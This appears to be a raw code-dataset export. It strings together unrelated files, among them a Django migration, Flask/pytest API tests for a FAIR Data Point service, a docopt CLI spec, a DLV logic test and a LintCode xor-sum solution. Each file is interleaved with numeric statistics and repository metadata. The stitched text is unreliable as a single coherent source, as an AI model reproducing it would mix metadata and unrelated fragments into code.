('logo', models.TextField(blank=True, default=None, max_length=500, null=True)),
],
),
migrations.AddField(
model_name='medicinegrad',
name='university',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
),
migrations.AddField(
model_name='lawgrad',
name='university',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
),
migrations.AddField(
model_name='engineeringgrad',
name='gre',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='university.GRE'),
),
migrations.AddField(
model_name='engineeringgrad',
name='university',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
),
migrations.AddField(
model_name='businessgrad',
name='gre',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.GRE'),
),
migrations.AddField(
model_name='businessgrad',
name='university',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
),
]
| 67.676471
| 128
| 0.617268
| 1,456
| 13,806
| 5.741758
| 0.098214
| 0.144737
| 0.206699
| 0.258373
| 0.920574
| 0.91256
| 0.905144
| 0.902751
| 0.836124
| 0.773325
| 0
| 0.004079
| 0.236491
| 13,806
| 203
| 129
| 68.009852
| 0.789014
| 0.003259
| 0
| 0.709184
| 1
| 0
| 0.132495
| 0.036776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.005102
| 0.010204
| 0
| 0.030612
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a83a54edce83e37350bb8587106eae36c63db14f
| 14,056
|
py
|
Python
|
tests/test_endpoints.py
|
cffbots/fairdatapoint
|
6142b31408b5746d1a7e9f59e61735b7ad8bfde9
|
[
"Apache-2.0"
] | 9
|
2020-03-27T12:58:51.000Z
|
2021-01-21T16:22:46.000Z
|
tests/test_endpoints.py
|
MaastrichtU-IDS/fairdatapoint
|
f9f38903a629acbdb74a6a20014ac424cc3d3206
|
[
"Apache-2.0"
] | 26
|
2016-05-26T22:22:34.000Z
|
2020-02-13T07:12:37.000Z
|
tests/test_endpoints.py
|
MaastrichtU-IDS/fairdatapoint
|
f9f38903a629acbdb74a6a20014ac424cc3d3206
|
[
"Apache-2.0"
] | 4
|
2020-06-09T18:37:33.000Z
|
2020-12-16T08:05:01.000Z
|
import pytest
from fdp.fdp import create_app
@pytest.fixture(scope='class',
params=[None, 'http://0.0.0.0:8890/sparql'],
ids =['Memory Store', 'Persistent Store'])
def client(request):
'''Build http client'''
app = create_app(host='0.0.0.0', port=80, graph_endpoint=request.param)
with app.test_client() as client:
yield client
# to make sure creating a new store when calling client
@pytest.fixture(scope='function', params=[None], ids =['Memory Store'])
def client_new_store(request):
app = create_app(host='0.0.0.0', port=80, graph_endpoint=request.param)
with app.test_client() as client:
yield client
class TestBaseEndpointTests:
'''All implementations fo FDP should work for all endpoints.'''
# datadir fixture provided via pytest-datadir-ng
def test_fdp(self, client, datadir):
"""Testing post, get and put to fdp"""
rv = client.post('/fdp', data=datadir['fdp.ttl'])
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client.get('/fdp')
assert rv.status_code == 200
assert 'Allow' in rv.headers
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/turtle'
assert b'hasVersion "0.1"' in rv.data
assert b'metadataIssued "2019-04-09T10:01:00"^^xsd:dateTime' in rv.data
rv = client.put('/fdp', data=datadir['fdp_update.ttl'])
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client.get('/fdp')
assert rv.status_code == 200
assert b'hasVersion "0.2"' in rv.data
rv = client.delete('/fdp')
assert rv.status_code == 405
def test_fdp_invalid(self, client, datadir):
"""Test invalid metadata to fdp layer"""
rv = client.post('/fdp', data=datadir['fdp_invalid_missingRDFtype.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Not found subject with required RDF type' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_wrongRDFtype.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Not found subject with required RDF type' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_blank.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Not found subject with required RDF type' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_missingRequired.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Validation Report\nConforms: False\nResults (8)' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_unknownTerms.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Validation Report\nConforms: False\nResults (2)' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_2foucsNodes.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'FDP layer allows only one subject' in rv.json['message']
rv = client.post('/fdp', data=datadir['fdp_invalid_mixedMetadata.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Not allowed RDF type for layer FDP' in rv.json['message']
def test_catalog(self, client, datadir):
"""Testing post, get, put and delete to catalog"""
rv = client.post('/catalog', data=datadir['catalog01.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.post('/catalog', data=datadir['catalog02.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.get('/catalog')
assert rv.status_code == 200
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/plain'
assert b'catalog01' in rv.data
assert b'catalog02' in rv.data
rv = client.get('/catalog/catalog01')
assert rv.status_code == 200
assert 'Allow' in rv.headers
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/turtle'
assert b'catalog01' in rv.data
assert b'hasVersion "1.0"' in rv.data
rv = client.put('/catalog/catalog01', data=datadir['catalog01_update.ttl'])
# assert rv.status_code == 200
# assert rv.json['message'] == 'Ok'
print(rv.data)
assert rv.json['message'] == 'Ok'
rv = client.get('/catalog/catalog01')
assert rv.status_code == 200
assert b'catalog01' in rv.data
assert b'hasVersion "2.0"' in rv.data
rv = client.delete('/catalog/catalog01')
assert rv.status_code == 204
rv = client.get('/catalog/catalog01')
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.put('/catalog/catalog01', data=datadir['catalog01_update.ttl'])
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.delete('/catalog/catalog01')
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.get('/catalog')
assert rv.status_code == 200
assert b'catalog01' not in rv.data
assert b'catalog02' in rv.data
rv = client.delete('/catalog/catalog02')
assert rv.status_code == 204
rv = client.get('/catalog')
assert rv.status_code == 204
def test_catalog_invalid(self, client, datadir):
"""Test invalid metadata to catalog layer"""
rv = client.post('/catalog', data=datadir['catalog01_invalid_missingRequired.ttl'])
assert rv.status_code == 405
assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']
def test_dataset(self, client, datadir):
"""Testing post, get, put and delete to dataset"""
rv = client.post('/dataset', data=datadir['dataset01.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.post('/dataset', data=datadir['dataset02.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.get('/dataset')
assert rv.status_code == 200
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/plain'
assert b'breedb' in rv.data
assert b'dataset02' in rv.data
rv = client.get('/dataset/breedb', )
assert rv.status_code == 200
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/turtle'
assert b'breedb' in rv.data
assert b'hasVersion "1.0"' in rv.data
rv = client.put('/dataset/breedb', data=datadir['dataset01_update.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.get('/dataset/breedb', )
assert rv.status_code == 200
assert b'breedb' in rv.data
assert b'hasVersion "2.0"' in rv.data
rv = client.delete('/dataset/breedb')
assert rv.status_code == 204
rv = client.get('/dataset/breedb')
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.put('/dataset/breedb', data=datadir['dataset01_update.ttl'])
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.delete('/dataset/breedb')
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.get('/dataset')
assert rv.status_code == 200
assert b'breedb' not in rv.data
assert b'dataset02' in rv.data
rv = client.delete('/dataset/dataset02')
assert rv.status_code == 204
rv = client.get('/dataset')
assert rv.status_code == 204
def test_dataset_invalid(self, client, datadir):
"""Test invalid metadata to dataset layer"""
rv = client.post('/dataset', data=datadir['dataset01_invalid_missingRequired.ttl'])
assert rv.status_code == 405
assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']
def test_distribution(self, client, datadir):
"""Testing post, get, put and delete to distribution"""
rv = client.post('/distribution', data=datadir['dist01.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.post('/distribution', data=datadir['dist02.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.get('/distribution')
assert rv.status_code == 200
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/plain'
assert b'breedb-sparql' in rv.data
assert b'dist02' in rv.data
rv = client.get('/distribution/breedb-sparql')
assert rv.status_code == 200
assert 'GET' in rv.headers['Allow']
assert rv.mimetype == 'text/turtle'
assert b'breedb-sparql' in rv.data
assert b'hasVersion "1.0"' in rv.data
rv = client.put('/distribution/breedb-sparql', data=datadir['dist01_update.ttl'])
assert rv.status_code == 200
assert rv.json['message'] == 'Ok'
rv = client.get('/distribution/breedb-sparql')
assert rv.status_code == 200
assert b'breedb-sparql' in rv.data
assert b'hasVersion "2.0"' in rv.data
rv = client.delete('/distribution/breedb-sparql')
assert rv.status_code == 204
rv = client.get('/distribution/breedb-sparql')
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.put('/distribution/breedb-sparql', data=datadir['dist01_update.ttl'])
assert rv.status_code == 404
assert 'message' in rv.json
assert rv.json['message'] == 'Not Found'
rv = client.get('/distribution')
assert rv.status_code == 200
assert b'breedb-sparql' not in rv.data
assert b'dist02' in rv.data
rv = client.delete('/distribution/dist02')
assert rv.status_code == 204
rv = client.get('/distribution')
assert rv.status_code == 204
def test_distribution_invalid(self, client, datadir):
"""Test invalid metadata to distribution layer"""
rv = client.post('/distribution', data=datadir['dist01_invalid_missingRequired.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Validation Report\nConforms: False\nResults (9)' in rv.json['message']
rv = client.post('/distribution', data=datadir['dist01_invalid_2URLs.ttl'])
assert rv.status_code == 405
assert 'message' in rv.json
assert 'Validation Report\nConforms: False\nResults (1)' in rv.json['message']
class TestMIMETypes:
"""Test different MIME types for GET and POST methods"""
def test_fdp_n3(self, client_new_store, datadir):
with open(datadir['fdp.n3'], 'rb') as f:
data = f.read()
rv = client_new_store.post('/fdp', data=datadir['fdp.n3'], content_type = 'text/n3')
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client_new_store.get('/fdp', headers={'accept': 'text/n3'})
assert rv.status_code == 200
assert rv.mimetype == 'text/n3'
b'<http://0.0.0.0/fdp> <http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued> "2019-04-09T10:01:00"^^<http://www.w3.org/2001/XMLSchema#dateTime> .' in rv.data
# assert data == rv.data
# hard to test fulltext due to the random orders of output terms, so test only one term
def test_fdp_xml(self, client_new_store, datadir):
rv = client_new_store.post('/fdp', data=datadir['fdp.rdf'], content_type = 'application/rdf+xml')
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client_new_store.get('/fdp', headers={'accept': 'application/rdf+xml'})
assert rv.status_code == 200
assert rv.mimetype == 'application/rdf+xml'
assert b'<fdp:metadataIssued rdf:datatype="http://www.w3.org/2001/XMLSchema#dateTime">2019-04-09T10:01:00</fdp:metadataIssued>' in rv.data
def test_fdp_jsonld(self, client_new_store, datadir):
rv = client_new_store.post('/fdp', data=datadir['fdp.jsonld'], content_type = 'application/ld+json')
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client_new_store.get('/fdp', headers={'accept': 'application/ld+json'})
assert rv.status_code == 200
assert rv.mimetype == 'application/ld+json'
rv.json[0]['http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued'] == {
'@type': 'http://www.w3.org/2001/XMLSchema#dateTime', '@value': '2019-04-09T10:01:00'}
def test_fdp_nt(self, client_new_store, datadir):
rv = client_new_store.post('/fdp', data=datadir['fdp.nt'], content_type = 'application/n-triples')
assert rv.status_code == 200
assert 'message' in rv.json
assert rv.json['message'] == 'Ok'
rv = client_new_store.get('/fdp', headers={'accept': 'application/n-triples'})
assert rv.status_code == 200
assert rv.mimetype == 'application/n-triples'
b'<http://0.0.0.0/fdp> <http://rdf.biosemantics.org/ontologies/fdp-o#metadataIssued> "2019-04-09T10:01:00"^^<http://www.w3.org/2001/XMLSchema#dateTime> .' in rv.data
| 40.045584
| 173
| 0.618384
| 1,871
| 14,056
| 4.566542
| 0.092464
| 0.090824
| 0.101592
| 0.130618
| 0.862594
| 0.850655
| 0.828301
| 0.782537
| 0.725187
| 0.660112
| 0
| 0.038187
| 0.241747
| 14,056
| 351
| 174
| 40.045584
| 0.763464
| 0.051935
| 0
| 0.711027
| 0
| 0.011407
| 0.27122
| 0.044173
| 0
| 0
| 0
| 0
| 0.631179
| 1
| 0.053232
| false
| 0
| 0.007605
| 0
| 0.068441
| 0.003802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a868f485ffa7e63ccc61184eddf987c19e6a8685
| 11,464
|
py
|
Python
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 33
|
2020-03-02T23:42:15.000Z
|
2022-03-18T02:34:32.000Z
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 10
|
2020-02-27T13:43:00.000Z
|
2021-04-21T12:11:44.000Z
|
codeprep/cli/spec.py
|
maximzubkov/codeprep
|
807ee1ea33796b6853c45e9dcb4e866b3f09a5f2
|
[
"Apache-2.0"
] | 9
|
2020-03-16T14:28:06.000Z
|
2021-09-30T09:40:56.000Z
|
# SPDX-FileCopyrightText: 2020 Hlib Babii <hlibbabii@gmail.com>
#
# SPDX-License-Identifier: Apache-2.0
import logging
import docopt_subcommands as dsc
from codeprep.cli.impl import handle_splitting, handle_learnbpe
from codeprep.config import app_name, version
logger = logging.getLogger(__name__)
@dsc.command()
def nosplit_handler(args):
"""usage: {program} nosplit (-p <path> [-o <path-out>] | <text>) [-e <ext>]
[--no-spaces] [--no-unicode] [--no-com] ( [--no-str] | [-L=<max-str-length>] [--full-strings] )
[--calc-vocab] [--verbose]
Preprocesses the dataset without splitting compound identifier.
Options:
-p, --path <path> Path to the dataset to be preprocessed.
-o <path-out>, --output-path <path-out> Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
<text> Text to be preprocessed.
-e --ext <ext> In case of using --path argument:
Limits the set of input files to the files with the specified extension(s).
The format is the following: "py|java|...|js" If not specififed, all the files are read.
In case of passing text:
extension which a file containing source code written in this programming language would have,
e.g. 'java', 'py', 'js'.
--no-spaces, -0 Preserve newlines and tabs.
--no-unicode, -U Replace words containing non-ascii characters with <non-en> placeholders.
--no-com, -C Replace comments with <comment> placeholders.
--no-str, -S Replace strings with <string> placeholders.
--full-strings, -f Leave string literals as they are (without even splitting on whitespace characters)
-L, --max-str-length=<max-str-length> Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
equals to `sys.maxsize` if not specified.
--calc-vocab -V Calculate vocabulary of the preprocessed dataset afterwards
--verbose, -v Print logs with log level DEBUG and higher to stdout.
"""
handle_splitting(args)
@dsc.command()
def chars_handler(args):
"""usage: {program} chars (-p <path> [-o <path-out>] | <text>) [-e <ext>]
[--no-spaces] [--no-unicode] [--no-com] [--no-str | -L=<max-str-length>]
[--calc-vocab] [--verbose]
Preprocesses the dataset by splitting identifiers into characters.
Options:
-p, --path <path> Path to the dataset to be preprocessed.
-o <path-out>, --output-path <path-out> Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
<text> Text to be preprocessed.
-e --ext <ext> In case of using --path argument:
Limits the set of input files to the files with the specified extension(s).
The format is the following: "py|java|...|js" If not specififed, all the files are read.
In case of passing text:
extension which a file containing source code written in this programming language would have,
e.g. 'java', 'py', 'js'.
--no-spaces, -0 Preserve newlines and tabs.
--no-unicode, -U Replace words containing non-ascii characters with <non-en> placeholders.
--no-com, -C Replace comments with <comment> placeholders.
--no-str, -S Replace strings with <string> placeholders.
-L, --max-str-length=<max-str-length> Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
equals to `sys.maxsize` if not specified.
--calc-vocab -V Calculate vocabulary of the preprocessed dataset afterwards
--verbose, -v Print logs with log level DEBUG and higher to stdout.
"""
handle_splitting(args)
@dsc.command()
def basic_handler(args):
"""usage: {program} basic (-p <path> [-o <path-out>] | <text>) [-e <ext>] [-n [-r [-s]]]
[--no-spaces] [--no-unicode] [--no-case] [--no-com] [--no-str | -L=<max-str-length>]
[--calc-vocab] [--verbose]
Preprocesses the dataset by splitting compound identifiers according to CamelCase and snake_case conventions.
Options:
-p, --path <path> Path to the dataset to be preprocessed.
-o <path-out>, --output-path <path-out> Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
<text> Text to be preprocessed.
-e --ext <ext> In case of using --path argument:
Limits the set of input files to the files with the specified extension(s).
The format is the following: "py|java|...|js" If not specififed, all the files are read.
In case of passing text:
extension which a file containing source code written in this programming language would have,
e.g. 'java', 'py', 'js'.
--split-numbers, -n Split numbers into digits
--ronin, -r Preprocesses the dataset splitting identifiers with Ronin algorithm: http://joss.theoj.org/papers/10.21105/joss.00653.
--stem, -s Do stemming with Porter stemmer
--no-spaces, -0 Preserve newlines and tabs.
--no-unicode, -U Replace words containing non-ascii characters with <non-en> placeholders.
--no-case, -l Lowercase words and encode information about case in <Cap> <CAP> tokens.
--no-com, -C Replace comments with <comment> placeholders.
--no-str, -S Replace strings with <string> placeholders.
-L, --max-str-length=<max-str-length> Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
equals to `sys.maxsize` if not specified.
--calc-vocab -V Calculate vocabulary of the preprocessed dataset afterwards
--verbose, -v Print logs with log level DEBUG and higher to stdout.
"""
handle_splitting(args)
@dsc.command()
def bpe_handler(args):
"""usage: {program} bpe (1k | 5k | 10k | <bpe-codes-id>) (-p <path> [-o <path-out>] | <text>) [-e <ext>]
[--no-str | -L=<max-str-length>] [--no-com] [--no-spaces] [--no-unicode] [--calc-vocab] [--verbose]
Preprocesses the dataset by splitting compound identifiers according to CamelCase and snake_case conventions,
and applies byte-pair encoding (BPE) on top.
Options:
-p, --path <path> Path to the dataset to be preprocessed.
-o <path-out>, --output-path <path-out> Directory to which the pre-preprocessed corpus is to be written. If not specified, equals to '<path>_preprocessed'.
<text> Text to be preprocessed.
-e --ext <ext> In case of using --path argument:
Limits the set of input files to the files with the specified extension(s).
The format is the following: "py|java|...|js" If not specififed, all the files are read.
In case of passing text:
extension which a file containing source code written in this programming language would have,
e.g. 'java', 'py', 'js'.
--no-str, -S Replace strings with <string> placeholders.
--no-com, -C Replace comments with <comment> placeholders.
--no-spaces, -0 Preserve newlines and tabs.
--no-unicode, -U Replace words containing non-ascii characters with <non-en> placeholders.
-L, --max-str-length=<max-str-length> Replace string literal with `""` if its length including quotes exceeds `max_str_length`;
equals to `sys.maxsize` if not specified.
--calc-vocab -V Calculate vocabulary of the preprocessed dataset afterwards
--verbose, -v Print logs with log level DEBUG and higher to stdout.
"""
handle_splitting(args)
@dsc.command()
def bpelearn_handler(args):
"""usage: {program} learn-bpe <n-merges> -p <path> [-e <ext>] [--id <bpe-codes-id>] [--no-unicode | --bytes] [--word-end] [--legacy] [--verbose]
Trains bpe codes on a specified corpus.
Options:
<n-merges> The number of BPE merges to compute
-p, --path <path> Path to the dataset to be used to learn bpe codes.
-e --ext <ext> Limits the set of input files to the files with the specified extension(s).
The format is the following: "ext1|ext2|...|extN" If not specififed, all the files are read.
--id <bpe-codes-id> Give an id to bpe-codes. If not specified, will be assigned automatically based on the name of the directory bpe codes were learned from
--no-unicode, -U Ignore words containing non-ascii characters.
--bytes, -b Treat non-ascii characters as 2 bytes and do real byte-pair encoding.
--word-end, -z Add a special character to the end of each word.
--legacy Parse using legacy parser (only files with extension “.java” will be processed)
--verbose, -v Print logs with log level DEBUG and higher to stdout.
"""
handle_learnbpe(args)
def parse_and_run(args):
dsc.main(app_name, f'{app_name} {version}', argv=args, exit_at_end=False)
| 64.768362
| 187
| 0.516661
| 1,267
| 11,464
| 4.64483
| 0.188635
| 0.016313
| 0.032625
| 0.017672
| 0.752082
| 0.743246
| 0.73407
| 0.73407
| 0.720136
| 0.7113
| 0
| 0.004155
| 0.391137
| 11,464
| 177
| 188
| 64.768362
| 0.838968
| 0.900994
| 0
| 0.409091
| 0
| 0
| 0.029455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.181818
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a883ff1a0bd8a339fd95681c4bad6ec866cfe6ab
| 197
|
py
|
Python
|
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/detcons.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
x | y.
:- x.
a :- x.
a :- not y.
a :- b.
b :- a.
t :- not a, not b, not x.
"""
output = """
x | y.
:- x.
a :- x.
a :- not y.
a :- b.
b :- a.
t :- not a, not b, not x.
"""
| 10.368421
| 26
| 0.329949
| 40
| 197
| 1.625
| 0.2
| 0.123077
| 0.092308
| 0.123077
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0
| 0.375635
| 197
| 18
| 27
| 10.944444
| 0.528455
| 0
| 0
| 0.888889
| 0
| 0
| 0.830601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a8980c03dc8f666410fca2c8e1ef1a095144b3ae
| 2,855
|
py
|
Python
|
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | 1
|
2021-01-08T06:57:49.000Z
|
2021-01-08T06:57:49.000Z
|
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | null | null | null |
lintcode/1516.py
|
jianershi/algorithm
|
c3c38723b9c5f1cc745550d89e228f92fd4abfb2
|
[
"MIT"
] | 1
|
2021-01-08T06:57:52.000Z
|
2021-01-08T06:57:52.000Z
|
"""
1516. Xor Sum
https://www.lintcode.com/problem/xor-sum/description
"""
from collections import deque
class Solution:
"""
@param arr: the arr
@param target: the target
@return: the sum of paths
"""
def xorSum(self, arr, target):
# Write your code here.
if not arr or not arr[0]:
return 0
n = len(arr)
m = len(arr[0])
hit_to_x_y_with_now_sum = {} #(x, y) : sum
queue1 = deque([(0, 0, arr[0][0])])
queue2 = deque([(n - 1, m - 1, arr[n - 1][m - 1])])
# hit_to_x_y_with_now_sum[(0, 0, arr[0][0])] = 1
# hit_to_x_y_with_now_sum[(n - 1, m - 1, arr[n - 1][m - 1])] = 1
QUEUE1_DIRECTION = [(0, 1), (1, 0)]
QUEUE2_DIRECTION = [(0, -1), (-1, 0)]
hit = 0
self.process_queue(queue1, arr, QUEUE1_DIRECTION, hit_to_x_y_with_now_sum, target, 0)
hit += self.process_queue(queue2, arr, QUEUE2_DIRECTION, hit_to_x_y_with_now_sum, target, 1)
return hit
def process_queue(self, queue, arr, queue_direction, hit_to_x_y_with_now_sum, target, flag):
hit = 0
n = len(arr)
m = len(arr[0])
while queue:
x, y, now_sum = queue.popleft()
if x + y == (n + m) // 2:
hit_to_x_y_with_now_sum[(x, y, now_sum, flag)] = hit_to_x_y_with_now_sum.get((x, y, now_sum, flag), 0) + 1
hit += hit_to_x_y_with_now_sum.get((x, y, target ^ now_sum ^ arr[x][y], not flag), 0)
continue
for delta in queue_direction:
nx = x + delta[0]
ny = y + delta[1]
if not self.is_valid(arr, nx, ny):
continue
next_now_sum = now_sum ^ arr[nx][ny]
queue.append((nx, ny, next_now_sum))
return hit
def is_valid(self, arr, x, y):
n = len(arr)
m = len(arr[0])
return 0 <= x < n and 0 <= y < m
s = Solution()
arr = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
target = 0
print(s.xorSum(arr, target))
| 42.61194
| 847
| 0.511033
| 721
| 2,855
| 1.920943
| 0.09154
| 0.581949
| 0.862094
| 1.14657
| 0.53574
| 0.492419
| 0.492419
| 0.481588
| 0.433213
| 0.320578
| 0
| 0.208983
| 0.235727
| 2,855
| 66
| 848
| 43.257576
| 0.425756
| 0.099124
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0
| 1
| 0.071429
| false
| 0
| 0.02381
| 0
| 0.214286
| 0.02381
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8d76810d654599d3101f15d10d7d5fab3e41183
| 3,465
|
py
|
Python
|
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edit_contact.py
|
tatyankaZSGX/addressbook
|
7a22108f570fe6933c65c8e5e6f0159d114b232c
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'ZSGX'
from model.contact import Contact
import random
#def test_edit_first_contact_from_homepage(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(firstname="test"))
# contact = Contact(firstname="first", middlename="Jasd", lastname="homepage", nickname="Madsti",
# title="adasor", company="Hoasdadood", address="Ladngeles")
